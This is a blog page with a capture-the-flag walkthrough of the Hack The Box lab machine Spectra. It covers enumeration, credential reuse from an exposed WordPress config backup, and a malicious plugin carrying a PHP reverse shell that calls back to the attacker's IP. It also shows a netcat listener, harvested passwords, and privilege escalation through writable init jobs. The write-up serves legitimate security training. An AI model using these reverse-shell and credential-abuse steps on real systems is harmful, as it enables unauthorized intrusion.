<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.24.0 by Michael Rose
  Copyright 2013-2020 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->
<html lang="en" class="no-js">
  <head>
    <!-- start custom head snippets -->
<!-- Begin Jekyll GTM tag v1.0.3 -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-MF4PLJ5');</script>
<!-- End Jekyll GTM tag v1.0.3 -->


<!-- insert favicons. use https://realfavicongenerator.net/ -->
<link rel="shortcut icon" href="/assets/images/favicon.ico" />

<!-- Multilang tags -->

    
<link rel="alternate" hreflang="pt-BR" href="https://davicruz.com/walkthrough/2021/06/htb-spectra">
<link rel="alternate" hreflang="x-default" href="https://davicruz.com/walkthrough/2021/06/htb-spectra">
    

    
<link rel="alternate" hreflang="en-US" href="https://davicruz.com/en-US/walkthrough/2021/06/htb-spectra">
        
<link rel="alternate" hreflang="en" href="https://davicruz.com/en-US/walkthrough/2021/06/htb-spectra">
        
    


<!-- end custom head snippets -->

    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>Walktrough: HTB Spectra | Davi Cruz</title>
<meta name="description" content="Hello guys!  This week’s machine will be Spectra, another easy-rated box from Hack The Box, created by egre55.">


  <meta name="author" content="Davi Cruz">
  
  <meta property="article:author" content="Davi Cruz">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="Davi Cruz">
<meta property="og:title" content="Walktrough: HTB Spectra">
<meta property="og:url" content="https://davicruz.com/walkthrough/2021/06/htb-spectra">


  <meta property="og:description" content="Hello guys!  This week’s machine will be Spectra, another easy-rated box from Hack The Box, created by egre55.">



  <meta property="og:image" content="https://i.imgur.com/KjpVjtL.png">



  <meta name="twitter:site" content="@zerahzurc">
  <meta name="twitter:title" content="Walktrough: HTB Spectra">
  <meta name="twitter:description" content="Hello guys!  This week’s machine will be Spectra, another easy-rated box from Hack The Box, created by egre55.">
  <meta name="twitter:url" content="https://davicruz.com/walkthrough/2021/06/htb-spectra">

  
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:image" content="https://i.imgur.com/KjpVjtL.png">
  

  



  <meta property="article:published_time" content="2021-06-26T13:00:00-03:00">





  

  


<link rel="canonical" href="https://davicruz.com/walkthrough/2021/06/htb-spectra">




<script type="application/ld+json">
  {
    "@context": "https://schema.org",
    
      "@type": "Person",
      "name": "Davi Cruz",
      "url": "https://davicruz.com/",
      "sameAs": ["https://twitter.com/zerahzurc","https://www.linkedin.com/in/davicruz","https://github.com/davi-cruz"]
    
  }
</script>


  <meta name="google-site-verification" content="hrWV-PqvbpxEy2HdpVYFQNws2Sz_tROleVyF18s2kWA" />


  <meta name="msvalidate.01" content="60B1FA6CDAF15D226AB529AF30386BD8">



  <meta name="yandex-verification" content="08de8d8c0326420f">



<!-- end _includes/seo.html -->



  <link href="/feed.xml" type="application/atom+xml" rel="alternate" title="Davi Cruz Feed">


<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css"></noscript>



  </head>

  <body class="layout--single wide">
    <!-- Begin Jekyll GTM tag v1.0.3 (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MF4PLJ5" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Jekyll GTM tag v1.0.3 (noscript) -->

    <nav class="skip-links">
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Skip to primary navigation</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Skip to content</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Skip to footer</a></li>
  </ul>
</nav>

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        <!-- CUSTOM: Edit to adjust links to localized page -->
        
        
          <a class="site-logo" href="/en-US"><img src="/assets/images/logo.png" alt="Davi Cruz"></a>
        
        <a class="site-title" href="/en-US">
          Davi Cruz
          
        </a>
        
        <!-- END CUSTOM: Edit to adjust links to localized page -->
        <ul class="visible-links">
          <!-- CUSTOM: Edit to get localized navigation --><li class="masthead__menu-item">
              <a href="/en-US/categories/">Categories</a>
            </li>
<li class="masthead__menu-item">
              <a href="/en-US/tag/">Tags</a>
            </li>
<li class="masthead__menu-item">
              <a href="/en-US/about/">About</a>
            </li>
<!-- END CUSTOM: Edit to get localized navigation -->
        </ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Toggle search</span>
          <i class="fas fa-search"></i>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      





<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person" class="h-card">

  
    <div class="author__avatar">
      <a href="https://davicruz.com/">
        <img src="/assets/images/bio-photo.jpg" alt="Davi Cruz" itemprop="image" class="u-photo">
      </a>
    </div>
  

  <div class="author__content">
    <h3 class="author__name p-name" itemprop="name">
      <a class="u-url" rel="me" href="https://davicruz.com/" itemprop="url">Davi Cruz</a>
    </h3>
    
      <div class="author__bio p-note" itemprop="description">
        <p>Just another Cybersecurity professional</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Follow</button>
    <ul class="author__urls social-icons">
      
        <li itemprop="homeLocation" itemscope itemtype="https://schema.org/Place">
          <i class="fas fa-fw fa-map-marker-alt" aria-hidden="true"></i> <span itemprop="name" class="p-locality">São Paulo, BR</span>
        </li>
      

      
        
          
            <li><a href="https://linkedin.com/in/davicruz" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fab fa-linkedin" aria-hidden="true"></i><span class="label">Linkedin</span></a></li>
          
        
          
            <li><a href="https://twitter.com/zerahzurc" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i><span class="label">Twitter</span></a></li>
          
        
          
            <li><a href="https://github.com/davi-cruz" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-github" aria-hidden="true"></i><span class="label">GitHub</span></a></li>
          
        
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      <!--
  <li>
    <a href="http://link-to-whatever-social-network.com/user/" itemprop="sameAs" rel="nofollow noopener noreferrer me">
      <i class="fas fa-fw" aria-hidden="true"></i> Custom Social Profile Link
    </a>
  </li>
-->
    </ul>
  </div>
</div>

  
  </div>



  <article class="page h-entry" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="Walktrough: HTB Spectra">
    <meta itemprop="description" content="Hello guys!This week’s machine will be Spectra, another easy-rated box from Hack The Box, created by egre55.">
    <meta itemprop="datePublished" content="2021-06-26T13:00:00-03:00">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title p-name" itemprop="headline">
            <a href="https://davicruz.com/walkthrough/2021/06/htb-spectra" class="u-url" itemprop="url">Walktrough: HTB Spectra
</a>
          </h1>
          

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-06-26T13:00:00-03:00">June 26, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          9 minute read
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    <span class="page__meta-lang"><a href="/walkthrough/2021/06/htb-spectra">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
    

    

    

    
    
    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Share</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


        </header>
      

      <section class="page__content e-content" itemprop="text">
        
        <p>Hello guys!</p>

<p>This week’s machine will be <strong>Spectra</strong>, another easy-rated box from <a href="https://www.hackthebox.eu">Hack The Box</a>, created by <a href="https://app.hackthebox.eu/users/1190">egre55</a>.<!--more--></p>

<p class="notice--info"><img class="emoji" title=":information_source:" alt=":information_source:" src="https://github.githubassets.com/images/icons/emoji/unicode/2139.png" height="20" width="20"> <strong>Info</strong>: Write-ups for Hack The Box machines are posted as soon as they’re retired.</p>

<p><img src="https://i.imgur.com/OqO1ZZh.png" alt="HTB Spectra" class="align-center"></p>

<h2 id="enumeration">Enumeration</h2>

<p>As usual, started with a quick <code class="language-plaintext highlighter-rouge">nmap</code> scan to enumerate all published services in this box.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ target</span><span class="o">=</span>10.10.10.229<span class="p">;</span> nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-Pn</span> <span class="nt">-oA</span> quick <span class="nv">$target</span>
Host discovery disabled <span class="o">(</span><span class="nt">-Pn</span><span class="o">)</span><span class="nb">.</span> All addresses will be marked <span class="s1">'up'</span> and scan <span class="nb">times </span>will be slower.
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-03-12 12:57 EST
Nmap scan report <span class="k">for </span>10.10.10.229
Host is up <span class="o">(</span>0.079s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.1 <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|_  4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a <span class="o">(</span>RSA<span class="o">)</span>
80/tcp   open  http    nginx 1.17.4
|_http-server-header: nginx/1.17.4
|_http-title: Site doesn<span class="s1">'t have a title (text/html).
3306/tcp open  mysql   MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.73 seconds
</span></code></pre></div></div>

<h3 id="80tcp---http-service">80/TCP - HTTP Service</h3>

<p>After first access to this service, we notice a quite simple HTML page containing a message and two links.</p>

<p>While inspecting the source code of this page, we can see that both links refer to assets located at <code class="language-plaintext highlighter-rouge">spectra.htb</code> domain, which was later added to the local hosts file to correct name resolution.</p>

<p><img src="https://i.imgur.com/ady30IK.png" alt="Spectra HTB - Issue Tracking page" class="align-center"></p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;h1&gt;</span>Issue Tracking<span class="nt">&lt;/h1&gt;</span>

<span class="nt">&lt;h2&gt;</span>Until IT set up the Jira we can configure and use this for issue tracking.<span class="nt">&lt;/h2&gt;</span>

<span class="nt">&lt;h2&gt;&lt;a</span> <span class="na">href=</span><span class="s">"http://spectra.htb/main/index.php"</span> <span class="na">target=</span><span class="s">"mine"</span><span class="nt">&gt;</span>Software Issue Tracker<span class="nt">&lt;/a&gt;&lt;/h2&gt;</span>
<span class="nt">&lt;h2&gt;&lt;a</span> <span class="na">href=</span><span class="s">"http://spectra.htb/testing/index.php"</span> <span class="na">target=</span><span class="s">"mine"</span><span class="nt">&gt;</span>Test<span class="nt">&lt;/a&gt;&lt;/h2&gt;</span>
</code></pre></div></div>

<p>Accessing both links, I have noticed that these were WordPress websites but only the first (<em>Software Issue Tracker</em>) was working properly while the second (<em>Test</em>), was displaying a database connection error.</p>

<p><img src="https://i.imgur.com/QRXqNtu.png" alt="HTB Spectra - Software Issue Tracker" class="align-center"></p>

<p><img src="https://i.imgur.com/lqTri7v.png" alt="HTB Spectra - Testing" class="align-center"></p>

<h4 id="wpscan">WPScan</h4>

<p>To gather more information about both WordPress sites, executed WPScan against them, but only worked to the first once the Test wasn’t working correctly.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wpscan <span class="nt">--url</span> &lt;url&gt; <span class="nt">-e</span> vp,vt,tt,cb,dbe,u,m <span class="nt">--plugins-detection</span> aggressive <span class="nt">--plugins-version-detection</span> aggressive <span class="nt">-f</span> cli-no-color 2&gt;&amp;1 | <span class="nb">tee</span> <span class="s2">"./wpscan_&lt;url&gt;.txt"</span>
</code></pre></div></div>

<p>The following information was identified for the <code class="language-plaintext highlighter-rouge">main</code> (<em>Software Issue Tracking</em>) website:</p>

<ul>
  <li>WordPress version: 5.4.2</li>
  <li>Users: administrator</li>
</ul>

<p>Proceeding with a manual enumeration, also noticed that for <em>Testing</em> website there’s no redirect to <code class="language-plaintext highlighter-rouge">index.php</code>, allowing us to list the directory content, allowing us to spot an interesting file: <strong><code class="language-plaintext highlighter-rouge">wp-config.php.save</code></strong>.</p>

<p><img src="https://i.imgur.com/0pPowA4.png" alt="image-20210515144447118" class="align-center"></p>

<p>As this file isn’t with the <code class="language-plaintext highlighter-rouge">*.php</code> extension, it won’t be interpreted by the webserver, allowing us to download it, as the command line below.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget http://spectra.htb/testing/wp-config.php.save
</code></pre></div></div>

<p>Inspecting its content, we can see the credentials for user <strong>devtest</strong>, as listed below:</p>

<blockquote>
  <p>Username: devtest</p>

  <p>Password: devteam01</p>
</blockquote>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// ** MySQL settings - You can get this info from your web host ** //</span>
<span class="cd">/** The name of the database for WordPress */</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_NAME'</span><span class="p">,</span> <span class="s1">'dev'</span> <span class="p">);</span>

<span class="mf">...</span><span class="n">skipping</span> <span class="mi">1</span> <span class="n">line</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_USER'</span><span class="p">,</span> <span class="s1">'devtest'</span> <span class="p">);</span>

<span class="cd">/** MySQL database password */</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_PASSWORD'</span><span class="p">,</span> <span class="s1">'devteam01'</span> <span class="p">);</span>

<span class="cd">/** MySQL hostname */</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_HOST'</span><span class="p">,</span> <span class="s1">'localhost'</span> <span class="p">);</span>

<span class="cd">/** Database Charset to use in creating database tables. */</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_CHARSET'</span><span class="p">,</span> <span class="s1">'utf8'</span> <span class="p">);</span>

<span class="cd">/** The Database Collate type. Don't change this if in doubt. */</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_COLLATE'</span><span class="p">,</span> <span class="s1">''</span> <span class="p">);</span>
</code></pre></div></div>

<p>As the <code class="language-plaintext highlighter-rouge">nmap</code> enumeration listed a MySQL database, tried to use these creds to authenticate to it but the source IP wasn’t allowed to connect to the specified instance, preventing us to harvest some sensitive information from the database.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>mysql <span class="nt">-u</span> devtest <span class="nt">-p</span> <span class="nt">-h</span> spectra.htb
Enter password:
ERROR 1130 <span class="o">(</span>HY000<span class="o">)</span>: Host <span class="s1">'10.10.10.10'</span> is not allowed to connect to this MySQL server
</code></pre></div></div>

<p>As credential reuse is a common thing, tried to authenticate to WordPress with the password found for the username <code class="language-plaintext highlighter-rouge">administrator</code> and had success in it!</p>

<p><img src="https://i.imgur.com/7k3nxVN.png" alt="HTB Spectra - Wordpress" class="align-center"></p>

<h2 id="initial-access">Initial Access</h2>

<p>Once we have access to the WordPress administration console, there are several ways to get a reverse shell with this permission, being the most common the upload of a malicious plugin to it with a web shell or reverse shell payload.</p>

<p>The easiest way would use the <a href="https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/webapp/wp_admin_shell_upload.md">wp_admin_shell_upload</a> module from Metasploit Framework but, if you’re preparing for the OSCP exam, where you should wisely choose when to use the msfconsole, using it for this isn’t a good idea <img class="emoji" title=":smile:" alt=":smile:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f604.png" height="20" width="20">.</p>

<p>So, to create this plugin, I have executed the following steps:</p>

<ul>
  <li>Created a file with the plugin header. This header must follow the minimum requirements as documented on <a href="https://developer.wordpress.org/plugins/plugin-basics/header-requirements/">Header Requirements | Plugin Developer Handbook | WordPress Developer Resources</a>. In our case I’ve created the file <code class="language-plaintext highlighter-rouge">evilplugin.php</code> with the contents below:</li>
</ul>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cd">/**
 * Plugin Name: evilplugin
  * Version: 1.0
  * Author: evilauthor
  * Author URI: http://evilplugin.test.com
  * License: GPL2
  */</span>
</code></pre></div></div>

<ul>
  <li>Create another file with the desired payload. In this case, as my objective is to directly get a reverse shell, made a copy of <a href="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php">Pentest Monkey’s PHP reverse shell</a>, changing the details to my IP address and port, saving it as <code class="language-plaintext highlighter-rouge">exploit.php</code>.</li>
</ul>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Usage</span>
<span class="c1">// -----</span>
<span class="c1">// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.</span>
<span class="nb">set_time_limit</span> <span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="nv">$VERSION</span> <span class="o">=</span> <span class="s2">"1.0"</span><span class="p">;</span>
<span class="nv">$ip</span> <span class="o">=</span> <span class="s1">'10.10.10.10'</span><span class="p">;</span>  <span class="c1">// CHANGE THIS</span>
<span class="nv">$port</span> <span class="o">=</span> <span class="mi">4443</span><span class="p">;</span>       <span class="c1">// CHANGE THIS</span>
<span class="nv">$chunk_size</span> <span class="o">=</span> <span class="mi">1400</span><span class="p">;</span>
<span class="nv">$write_a</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nv">$error_a</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nv">$shell</span> <span class="o">=</span> <span class="s1">'uname -a; w; id; /bin/sh -i'</span><span class="p">;</span>
<span class="nv">$daemon</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="nv">$debug</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</code></pre></div></div>

<ul>
  <li>Compress the file as below, where the file name must be the same as the plugin header with the zip extension.</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>zip evilplugin.zip evilplugin.php exploit.php
  adding: evilplugin.php <span class="o">(</span>deflated 9%<span class="o">)</span>
  adding: exploit.php <span class="o">(</span>deflated 59%<span class="o">)</span>
</code></pre></div></div>

<ul>
  <li>Once created, accessed the WordPress portal, authenticated with the administrative account and, from the left side, selected the options <em>Plugins</em> &gt; <em>Add New</em> and, at the top of the page, hit the button <em>Upload Plugin</em>
</li>
</ul>

<p><img src="https://i.imgur.com/UlBkZNE.png" alt="HTB Spectra - Upload evilplugin.zip" class="align-center"></p>

<ul>
  <li>Initialize the listener according to the configured payload. In our case, I’ve started a <code class="language-plaintext highlighter-rouge">netcat</code> listener using the command line below</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc <span class="nt">-lnvp</span> 4443
</code></pre></div></div>

<ul>
  <li>Selected the zip file and hit the button <em>Install Now</em>
</li>
</ul>

<p><img src="https://i.imgur.com/sNlvuWi.png" alt="HTB Spectra - Installed evilplugin.zip" class="align-center"></p>

<ul>
  <li>As soon as the install request is processed, is important to issue the request to the file location under the WordPress folder structure. The command line below uses <code class="language-plaintext highlighter-rouge">curl</code> to make the request, but you could use your browser as well.</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-L</span> http://spectra.htb/main/wp-content/plugins/evilplugin/exploit.php
</code></pre></div></div>

<p>After this process, we should receive a connection from the victim machine, we below: <img class="emoji" title=":smiley:" alt=":smiley:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f603.png" height="20" width="20"></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nc <span class="nt">-lnvp</span> 4443
listening on <span class="o">[</span>any] 4443 ...
connect to <span class="o">[</span>10.10.10.10] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.229] 43298
Linux spectra 5.4.66+ <span class="c">#1 SMP Tue Dec 22 13:39:49 UTC 2020 x86_64 AMD EPYC 7401P 24-Core Processor AuthenticAMD GNU/Linux</span>
 08:41:48 up 4 min,  0 <span class="nb">users</span>,  load average: 0.26, 0.31, 0.17
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
<span class="nv">uid</span><span class="o">=</span>20155<span class="o">(</span>nginx<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>20156<span class="o">(</span>nginx<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>20156<span class="o">(</span>nginx<span class="o">)</span>
nginx@spectra / <span class="nv">$ </span><span class="nb">id
id
</span><span class="nv">uid</span><span class="o">=</span>20155<span class="o">(</span>nginx<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>20156<span class="o">(</span>nginx<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>20156<span class="o">(</span>nginx<span class="o">)</span>
nginx@spectra / <span class="err">$</span>
</code></pre></div></div>

<p class="notice--info"><img class="emoji" title=":bulb:" alt=":bulb:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f4a1.png" height="20" width="20"> <strong>Tip:</strong> There are several ways to achieve the same outcome not using the Metasploit framework. You could inject code into a Theme file or even use other scripts/tools available like <a href="https://github.com/n00py/WPForce">n00py/WPForce: WordPress Attack Suite (github.com)</a>, which automates this and other tasks frequently used while compromising WordPress sites.</p>

<h2 id="user-flag">User flag</h2>

<p>After the initial access, initiated the machine enum using <code class="language-plaintext highlighter-rouge">linpeas.sh</code>, where the following details were identified:</p>

<ul>
  <li>
    <p>User: <strong>nginx</strong>, without any special privileges (<code class="language-plaintext highlighter-rouge">uid=20155(nginx) gid=20156(nginx) groups=20156(nginx)</code>)</p>
  </li>
  <li>
    <p>Operating System: <strong>Chromium OS 11</strong>.0_pre399094_p20200824-r6</p>
  </li>
  <li>
    <p>Content published using Nginx from <code class="language-plaintext highlighter-rouge">/usr/local/share/nginx/html</code> directory, vide file path of <code class="language-plaintext highlighter-rouge">wp-config.php</code> files, where the creds below were also harvested:</p>

    <table>
      <thead>
        <tr>
          <th>site</th>
          <th>Username</th>
          <th>Password</th>
        </tr>
      </thead>
      <tbody>
        <tr>
          <td>main</td>
          <td>dev</td>
          <td>development01</td>
        </tr>
        <tr>
          <td>testing</td>
          <td>devtest</td>
          <td>devteam01</td>
        </tr>
      </tbody>
    </table>
  </li>
  <li>
    <p>Users with console access, being a possible elevation path, as well as their privileges:</p>
  </li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[+] Users with console
chronos:x:1000:1000:system_user:/home/chronos/user:/bin/bash
katie:x:20156:20157::/home/katie:/bin/bash
root:x:0:0:root:/root:/bin/bash

uid=20156(katie) gid=20157(katie) groups=20157(katie),20158(developers)
uid=1001(chronos-access) gid=1001(chronos-access) groups=1001(chronos-access)
</code></pre></div></div>

<ul>
  <li>
    <p>MySQL  Ver 14.14 Distrib 5.7.20-19, for Linux (x86_64) using  6.3</p>
  </li>
  <li>
    <p>Possible SSH keys</p>
  </li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/share/chromeos-ssh-config/keys/authorized_keys
/usr/share/chromeos-ssh-config/keys/id_rsa
/usr/share/chromeos-ssh-config/keys/id_rsa.pub
</code></pre></div></div>

<ul>
  <li>Uncommon passwd files, being one of them for <strong>autologin</strong> containing the password <strong>SummerHereWeCome!!</strong>
</li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[+] Searching uncommon passwd files (splunk)
passwd file: /etc/autologin/passwd
passwd file: /etc/pam.d/passwd
passwd file: /usr/share/baselayout/passwd

/etc/autologin/passwd
-rw-r--r-- 1 root root 19 Feb  3 16:43 /etc/autologin/passwd
SummerHereWeCome!!
</code></pre></div></div>

<ul>
  <li>File <code class="language-plaintext highlighter-rouge">user.txt</code> at <strong>katie</strong>’s home path, seen from a manual enumeration.</li>
</ul>

<p>Once we have found some passwords, decided to test them for users <code class="language-plaintext highlighter-rouge">katie</code> and <code class="language-plaintext highlighter-rouge">chronos</code>, being successful with the combination <strong>katie:SummerHereWeCome!!</strong></p>

<p>With access to this profile, got the user flag in her home directory</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>katie@spectra ~ <span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>20156<span class="o">(</span>katie<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>20157<span class="o">(</span>katie<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>20157<span class="o">(</span>katie<span class="o">)</span>,20158<span class="o">(</span>developers<span class="o">)</span>
katie@spectra ~ <span class="nv">$ </span><span class="nb">cat </span>user.txt
e89d27fe195e9114ffa72ba8913a6130
katie@spectra ~ <span class="err">$</span>
</code></pre></div></div>

<h2 id="root-flag">Root flag</h2>

<p>As we had katie’s password, the first thing I did was to check if she was able to run something as root, as the following entry was found.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>katie@spectra ~ <span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
User katie may run the following commands on spectra:
    <span class="o">(</span>ALL<span class="o">)</span> SETENV: NOPASSWD: /sbin/initctl
katie@spectra ~ <span class="err">$</span>
</code></pre></div></div>

<p>Checking the binary, identified that it could be used to control jobs in the machine, as instructed below, but we would need to tamper with one of these jobs to get root access.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>katie@spectra ~ <span class="nv">$ </span>/sbin/initctl <span class="nb">help
</span>Job commands:
  start                       Start job.
  stop                        Stop job.
  restart                     Restart job.
  reload                      Send HUP signal to job.
  status                      Query status of job.
  list                        List known jobs.

Event commands:
  emit                        Emit an event.

Other commands:
  reload-configuration        Reload the configuration of the init daemon.
  version                     Request the version of the init daemon.
  log-priority                Change the minimum priority of log messages from the init daemon
  show-config                 Show emits, start on and stop on details <span class="k">for </span>job configurations.
  <span class="nb">help                        </span>display list of commands
</code></pre></div></div>

<p>Once katie’s is a member of the <strong>developers</strong> group, decided to look for files where this group was under the permissions and found some files in <code class="language-plaintext highlighter-rouge">/etc/init</code> folder, listed as jobs by <code class="language-plaintext highlighter-rouge">initctl</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>katie@spectra ~ <span class="nv">$ </span>find / <span class="nt">-group</span> developers 2&gt;/dev/null
/etc/init/test6.conf
/etc/init/test7.conf
/etc/init/test3.conf
/etc/init/test4.conf
/etc/init/test.conf
/etc/init/test8.conf
/etc/init/test9.conf
/etc/init/test10.conf
/etc/init/test2.conf
/etc/init/test5.conf
/etc/init/test1.conf
/srv
/srv/nodetest.js
katie@spectra ~ <span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span> /etc/init/test<span class="k">*</span>
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test1.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test10.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test2.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test3.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test4.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test5.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test6.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test7.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test8.conf
<span class="nt">-rw-rw----</span> 1 root developers 478 Jun 29  2020 /etc/init/test9.conf
</code></pre></div></div>

<p>To gain root access, I just needed to change one of the job files to get a reverse shell and then get the root’s flag.</p>

